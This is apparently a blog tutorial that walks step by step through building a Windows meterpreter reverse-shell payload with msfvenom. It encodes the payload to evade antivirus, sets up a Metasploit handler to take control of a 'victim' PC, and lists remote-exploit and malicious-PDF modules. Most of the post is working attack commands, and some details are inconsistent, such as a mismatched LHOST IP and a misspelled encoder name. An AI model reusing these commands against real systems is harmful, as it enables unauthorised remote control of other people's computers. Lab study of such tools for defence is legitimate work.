Client Side Attacks

If you are viewing this post then you should atleast got your own kali linux machine with you.
Assuming that you got your machine with you I was not uploading any reference Images.

As already mentioned

Attackers IP :10.4.33.3 [kali linux OS]

Victims IP    :10.4.33.8  [ Any Windows OS, use xp or 7 for  less complications]

The payload we use is windows/meterpreter/reverse_tcp

We already seen how to generate a payload but for now we are using msfvenom for creating a payload as it was a new update in kali linux 2 sana version.

Type this command in root terminal msfvenom -h

msfvenom

By looking the above help table we can create a payload

-p :specifying our payload

-a :arch

–platform : For mentioning the victims OS

-e : encoder, evading a infamous or unpaid antivirus system including windowsdefender

-f : format of the output file it may be .bat or .exe for windows .elf for linux etc.

-o : To save the output file at a defined location

Now getting our payload
I already mentioned you that there will be a several variables in a payload that are need to be defined before generating it.
You can know about those variables in metasploit by using the command show options

Finding Variables

  • Terminal 1

msfconsole

use exploit/multi/handler

use payload windows/meterpreter/reverse_tcp

show options 

Now you can see the list of variables needed ie LHOST LPORT.

Keep this terminal open we will get to this terminal again

Open up a new terminal and use this command for creating a payload

  • Terminal 2

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows LHOST=10.4.33.4 LPORT=3456 -e x86/shikta_ga_nai -f exe -o /root/Desktop/payload.exe

Here LHOST = our ip we can find it by using a terminal command [ifconfig]

LPORT = any port but remember the port.

After running this command successfully you can see a payload.exe file on your desktop.

Now you can close this second terminal.

Come back to our Terminal 1

msfconsole

use exploit/multi/handler

use payload windows/meterpreter/reverse_tcp

show options      [till here it was done already]

set LHOST 10.4.33.3    [our IP not the victims IP]

set LPORT 3456   [this is the reason we need to remember the port we used before]

set ExitOnSessions false   [Adavanced command no need to use, but its better if the attck was going on several machines]

exploit or exploit -j 

Remember if you use the -j [jobs tag] the meterpreter session will not be displayed directly, it will be assigned in a serial way to each session.
like first victim to session 1 and next to session 2 and follows.

So in the same terminal you need to use this extra command sessions -i 1 for interacting with 1 session ie operating 1 victim.

For this to be happen, the payload.exe file should be run in the victims PC, sending that file to the victims PC is One of a different task, but for now to get some information you just upload it in the victims PC and Run the file.

Terminal 1 should not be closed as that is the terminal of victim now after all these commands in an order.

It should look like this.

finalg

Here according to this image 192.168.222.135 is attacker and 192.168.222.137 is the victim.

And now you can see the meterpreter terminal, if you can see that, which means the PC with the IP above was now under your control.
It was hacked you can do what ever you want.

But disadvantages of this way

  1. We need to deliver the payload to victim [payload.exe] .
  2. A good antivirus can detect this.
  • Evading Antivirus Detection

you can evade almost any antivirus by creating your payload from veilevasion

there will be a different blog for that.

  • Delivering the Payload

This has some awesome techniques to do, but for now just send the files by your own

I can mention you some of the exploits that doesn’t need to deliver the payload

  1. exploit/windows/dcerpc/ms03_026_dcom [dcerpc vulnerability]
  2. exploit/windows/smb/ms08_067_netapi   [smb vulnerability]

But these are vulnerability specific  and both had a common variable RHOST , where you need to set the RHOST to 10.4.33.8 ie set RHOST 10.4.33.8 [victims ip]

There are some exploits that can be attached to PDFs and XL files

exploit/windows/fileformat/adobe_utilprintf

It varies according to the situation but what my aim is to not let you in any confusion and misconception.

Doubts and suggestions can be commented below.

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s